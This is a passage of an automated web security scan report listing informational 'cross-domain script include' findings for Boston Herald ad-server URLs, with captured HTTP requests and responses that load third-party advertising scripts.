Date: Fri, 28 Jan 2011 21:57:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.290. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.291. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.292. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.293. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.294. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.295. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.296. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.297. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.298. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.299. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.300. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.89.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:45:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1481
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?" type="text/javascript"></script>
...[SNIP]...

18.301. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.302. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1995531146/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=1995531146?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.197.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:16:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1995531146/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=1995531146?" type="text/javascript"></script>
...[SNIP]...

18.303. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.155.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P2021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?" type="text/javascript"></script>
...[SNIP]...

18.304. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P2021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.167.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:31:59 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1488
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?" type="text/javascript"></script>
...[SNIP]...

18.305. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1484
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?" type="text/javascript"></script>
...[SNIP]...

18.306. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.56.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:00:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48|P1021J4T; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1481
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?" type="text/javascript"></script>
...[SNIP]...

18.307. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?

Request

